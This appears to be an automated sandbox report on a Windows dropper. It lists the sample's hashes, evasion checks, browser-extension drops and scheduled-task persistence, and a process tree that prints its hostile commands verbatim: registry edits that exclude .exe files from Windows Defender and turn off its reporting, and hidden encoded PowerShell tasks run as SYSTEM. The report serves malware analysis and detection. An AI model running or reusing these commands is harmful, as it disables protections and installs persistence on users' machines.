Analysis
-
max time kernel
125s -
max time network
131s -
platform
windows10-1703_x64 -
resource
win10-20231023-en -
resource tags
arch:x64arch:x86image:win10-20231023-enlocale:en-usos:windows10-1703-x64system -
submitted
22-11-2023 18:11
Static task
static1
General
-
Target
8df9f0956f3a6cf5c75a90370089a2c54d862b52ffa1cb09058ca86f8f0a05eb.exe
-
Size
7.2MB
-
MD5
50490c0c3eb2a59b4383b257428e6cf7
-
SHA1
688e1166da34a927a3bff9e3365701951f43b147
-
SHA256
8df9f0956f3a6cf5c75a90370089a2c54d862b52ffa1cb09058ca86f8f0a05eb
-
SHA512
cbbe4720f7f3cdaba132b4d41c287dcbc80272f5b4ec11cfc4a8f599ee6e23c67cf101ca566f7307ef5be9aa725b037f449b40c20d0c7d077f2906a7beb99bbe
-
SSDEEP
196608:91OW+3P4zN1NqljEPxF0Sb7AjP1wmitThe0k:3OW+/4/c6n7AjF
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 33 3916 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2184424523-918736138-622003966-1000\Control Panel\International\Geo\Nation LqlkCgD.exe -
Executes dropped EXE 4 IoCs
pid Process 2180 Install.exe 4328 Install.exe 4580 afWdAHR.exe 5008 LqlkCgD.exe -
Loads dropped DLL 1 IoCs
pid Process 3916 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json LqlkCgD.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json LqlkCgD.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini LqlkCgD.exe -
Drops file in System32 directory 33 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini afWdAHR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA LqlkCgD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat LqlkCgD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 LqlkCgD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA LqlkCgD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 LqlkCgD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 LqlkCgD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_5B1817C873771E7928FB0BB0A329932B LqlkCgD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE LqlkCgD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content LqlkCgD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8C0A4A9E1CEFEB34D84E7975A8A5D28F LqlkCgD.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 LqlkCgD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8C0A4A9E1CEFEB34D84E7975A8A5D28F LqlkCgD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat rundll32.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 LqlkCgD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 LqlkCgD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_5B1817C873771E7928FB0BB0A329932B LqlkCgD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft LqlkCgD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache LqlkCgD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA LqlkCgD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA LqlkCgD.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol afWdAHR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies LqlkCgD.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol LqlkCgD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 LqlkCgD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData LqlkCgD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 LqlkCgD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 LqlkCgD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 LqlkCgD.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi LqlkCgD.exe File created C:\Program Files (x86)\XPfigSyVaogU2\YKGlgvP.xml LqlkCgD.exe File created C:\Program Files (x86)\LTyiovagU\XKIVjM.dll LqlkCgD.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak LqlkCgD.exe File created C:\Program Files (x86)\LTyiovagU\gSznfeU.xml LqlkCgD.exe File created C:\Program Files (x86)\INpMKNzTQJjxsUtEmkR\kqdFZbf.dll LqlkCgD.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi LqlkCgD.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja LqlkCgD.exe File created C:\Program Files (x86)\XPfigSyVaogU2\kXMKuIcVbjjMZ.dll LqlkCgD.exe File created C:\Program Files (x86)\wDCcPjpnCfSmC\PgexzDI.dll LqlkCgD.exe File created C:\Program Files (x86)\wDCcPjpnCfSmC\skOctYr.xml LqlkCgD.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak LqlkCgD.exe File created C:\Program Files (x86)\INpMKNzTQJjxsUtEmkR\mjnYlod.xml LqlkCgD.exe File created C:\Program Files (x86)\qRkTYBxtrfUn\SxjDQqs.dll LqlkCgD.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bIGGRJeqyVXrftfqbU.job schtasks.exe File created C:\Windows\Tasks\aQBnzvyVxwkajhGDA.job schtasks.exe File created C:\Windows\Tasks\OGyQYCCLNvuKRdK.job schtasks.exe File created C:\Windows\Tasks\dKyZitVvSfuUxAckm.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4064 schtasks.exe 2264 schtasks.exe 4860 schtasks.exe 5068 schtasks.exe 4840 schtasks.exe 2364 schtasks.exe 4176 schtasks.exe 2220 schtasks.exe 1280 schtasks.exe 3940 schtasks.exe 1696 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing LqlkCgD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer LqlkCgD.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "0" LqlkCgD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix LqlkCgD.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 LqlkCgD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket LqlkCgD.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache LqlkCgD.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" LqlkCgD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" LqlkCgD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" LqlkCgD.exe -
Suspicious behavior: EnumeratesProcesses 46 IoCs
pid Process 2244 powershell.EXE 2244 powershell.EXE 2244 powershell.EXE 2708 powershell.exe 2708 powershell.exe 2708 powershell.exe 1440 powershell.exe 1440 powershell.exe 1440 powershell.exe 4636 powershell.EXE 4636 powershell.EXE 4636 powershell.EXE 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe 5008 LqlkCgD.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2244 powershell.EXE Token: SeDebugPrivilege 2708 powershell.exe Token: SeDebugPrivilege 1440 powershell.exe Token: SeDebugPrivilege 4636 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 616 wrote to memory of 2180 616 8df9f0956f3a6cf5c75a90370089a2c54d862b52ffa1cb09058ca86f8f0a05eb.exe 71 PID 616 wrote to memory of 2180 616 8df9f0956f3a6cf5c75a90370089a2c54d862b52ffa1cb09058ca86f8f0a05eb.exe 71 PID 616 wrote to memory of 2180 616 8df9f0956f3a6cf5c75a90370089a2c54d862b52ffa1cb09058ca86f8f0a05eb.exe 71 PID 2180 wrote to memory of 4328 2180 Install.exe 72 PID 2180 wrote to memory of 4328 2180 Install.exe 72 PID 2180 wrote to memory of 4328 2180 Install.exe 72 PID 4328 wrote to memory of 3852 4328 Install.exe 74 PID 4328 wrote to memory of 3852 4328 Install.exe 74 PID 4328 wrote to memory of 3852 4328 Install.exe 74 PID 4328 wrote to memory of 2260 4328 Install.exe 77 PID 4328 wrote to memory of 2260 4328 Install.exe 77 PID 4328 wrote to memory of 2260 4328 Install.exe 77 PID 3852 wrote to memory of 3644 3852 forfiles.exe 79 PID 3852 wrote to memory of 3644 3852 forfiles.exe 79 PID 3852 wrote to memory of 3644 3852 forfiles.exe 79 PID 2260 wrote to memory of 4192 2260 forfiles.exe 78 PID 2260 wrote to memory of 4192 2260 forfiles.exe 78 PID 2260 wrote to memory of 4192 2260 forfiles.exe 78 PID 3644 wrote to memory of 1440 3644 cmd.exe 83 PID 3644 wrote to memory of 1440 3644 cmd.exe 83 PID 3644 wrote to memory of 1440 3644 cmd.exe 83 PID 4192 wrote to memory of 5080 4192 cmd.exe 82 PID 4192 wrote to memory of 5080 4192 cmd.exe 82 PID 4192 wrote to memory of 5080 4192 cmd.exe 82 PID 3644 wrote to memory of 2248 3644 cmd.exe 81 PID 3644 wrote to memory of 2248 3644 cmd.exe 81 PID 3644 wrote to memory of 2248 3644 cmd.exe 81 PID 4192 wrote to memory of 4864 4192 cmd.exe 80 PID 4192 wrote to memory of 4864 4192 cmd.exe 80 PID 4192 wrote to memory of 4864 4192 cmd.exe 80 PID 4328 wrote to memory of 2220 4328 Install.exe 84 PID 4328 wrote to memory of 2220 4328 Install.exe 84 PID 4328 wrote to memory of 2220 4328 Install.exe 84 PID 4328 wrote to memory of 3948 4328 Install.exe 86 PID 4328 wrote to memory of 3948 4328 Install.exe 86 PID 4328 wrote to memory of 3948 4328 Install.exe 86 PID 2244 wrote to memory of 1356 2244 powershell.EXE 90 PID 2244 wrote to memory of 1356 2244 powershell.EXE 90 PID 4328 wrote to memory of 216 4328 Install.exe 95 PID 4328 wrote to memory of 216 4328 Install.exe 95 PID 4328 wrote to memory of 216 4328 Install.exe 95 PID 4328 wrote to memory of 4064 4328 Install.exe 97 PID 4328 wrote to memory of 4064 4328 Install.exe 97 PID 4328 wrote to memory of 4064 4328 Install.exe 97 PID 4580 wrote to memory of 2708 4580 afWdAHR.exe 100 PID 4580 wrote to memory of 2708 4580 afWdAHR.exe 100 PID 4580 wrote to memory of 2708 4580 afWdAHR.exe 100 PID 2708 wrote to memory of 4840 2708 powershell.exe 102 PID 2708 wrote to memory of 4840 2708 powershell.exe 102 PID 2708 wrote to memory of 4840 2708 powershell.exe 102 PID 4840 wrote to memory of 4232 4840 cmd.exe 103 PID 4840 wrote to memory of 4232 4840 cmd.exe 103 PID 4840 wrote to memory of 4232 4840 cmd.exe 103 PID 2708 wrote to memory of 940 2708 powershell.exe 104 PID 2708 wrote to memory of 940 2708 powershell.exe 104 PID 2708 wrote to memory of 940 2708 powershell.exe 104 PID 2708 wrote to memory of 4844 2708 powershell.exe 105 PID 2708 wrote to memory of 4844 2708 powershell.exe 105 PID 2708 wrote to memory of 4844 2708 powershell.exe 105 PID 2708 wrote to memory of 3500 2708 powershell.exe 106 PID 2708 wrote to memory of 3500 2708 powershell.exe 106 PID 2708 wrote to memory of 3500 2708 powershell.exe 106 PID 2708 wrote to memory of 3040 2708 powershell.exe 107 PID 2708 wrote to memory of 3040 2708 powershell.exe 107
Processes
-
C:\Users\Admin\AppData\Local\Temp\8df9f0956f3a6cf5c75a90370089a2c54d862b52ffa1cb09058ca86f8f0a05eb.exe"C:\Users\Admin\AppData\Local\Temp\8df9f0956f3a6cf5c75a90370089a2c54d862b52ffa1cb09058ca86f8f0a05eb.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:616 -
C:\Users\Admin\AppData\Local\Temp\7zSE1A5.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Users\Admin\AppData\Local\Temp\7zSE290.tmp\Install.exe.\Install.exe /PdidFrwC "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:4328 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:3852 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:3644 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:2248
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1440
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4192 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:4864
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:5080
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gwDCChGRg" /SC once /ST 16:09:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:2220
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gwDCChGRg"4⤵PID:3948
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gwDCChGRg"4⤵PID:216
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bIGGRJeqyVXrftfqbU" /SC once /ST 18:13:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\oDSkGUOyYCDtYjDrm\xYqIlEpYtTyjYjv\afWdAHR.exe\" w6 /nTsite_idcFT 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4064
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:1356
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:1780
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:1208
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2372
-
C:\Users\Admin\AppData\Local\Temp\oDSkGUOyYCDtYjDrm\xYqIlEpYtTyjYjv\afWdAHR.exeC:\Users\Admin\AppData\Local\Temp\oDSkGUOyYCDtYjDrm\xYqIlEpYtTyjYjv\afWdAHR.exe w6 /nTsite_idcFT 525403 /S1⤵
- Executes dropped EXE
